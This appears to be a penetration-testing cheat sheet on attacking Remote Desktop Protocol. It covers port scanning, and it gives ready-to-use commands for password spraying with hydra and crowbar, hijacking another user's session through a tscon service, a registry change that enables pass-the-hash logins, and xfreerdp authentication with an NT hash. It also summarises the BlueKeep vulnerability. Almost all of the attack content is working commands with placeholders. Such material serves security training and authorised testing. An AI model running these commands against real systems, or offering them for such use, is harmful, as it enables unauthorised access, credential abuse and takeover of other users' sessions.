5. RDP

I. RDP Basics

• Function: Provides a graphical interface for remote computer access.

• Port: TCP/3389.

• Use Cases: System administration, MSPs.

• Attack Vectors:

  • Misconfigurations (weak/no passwords).

  • Password guessing/spraying.

  • Session hijacking.

  • Pass-the-Hash (PtH).

  • Exploiting vulnerabilities (e.g., BlueKeep).

II. Enumeration

• Nmap:

nmap -Pn -p3389 <target_IP>

III. Misconfigurations & Password Attacks

• Password Spraying:

crowbar -b rdp -s <target_IP>/32 -U <user_list> -c <password>
hydra -L <user_list> -p <password> <target_IP> rdp

• RDP Login:

rdesktop -u <user> -p <password> <target_IP>
xfreerdp /v:<target_IP> /u:<user> /p:<password>

IV. Protocol-Specific Attacks

• RDP Session Hijacking:

query user
sc.exe create sessionhijack binpath= "cmd.exe /k tscon <target_session_ID> /dest:rdp-tcp#<our_session_ID>"
net start sessionhijack

• RDP Pass-the-Hash (PtH):

• Enable Restricted Admin Mode (registry key):

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

• Authenticate using NT Hash:

xfreerdp /v:<target_IP> /u:<user> /pth:<NT_hash>

V. Latest RDP Vulnerabilities

• CVE-2019-0708 (BlueKeep):

  • RCE vulnerability.

  • Use-After-Free (UAF) technique.

  • Triggered by manipulated initialization requests.

  • Impacts older Windows versions.

  • Exploitation can cause system instability (BSoD).

Key Commands Summary

• Nmap:

nmap -Pn -p3389 <target_IP>

• Crowbar:

crowbar -b rdp -s <target_IP>/32 -U <user_list> -c <password>

• Hydra:

hydra -L <user_list> -p <password> <target_IP> rdp

• rdesktop:

rdesktop -u <user> -p <password> <target_IP>

• xfreerdp:

xfreerdp /v:<target_IP> /u:<user> /p:<password>
xfreerdp /v:<target_IP> /u:<user> /pth:<NT_hash>

• Windows Commands:

query user
sc.exe create sessionhijack binpath= "cmd.exe /k tscon <target_session_ID> /dest:rdp-tcp#<our_session_ID>"
net start sessionhijack
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f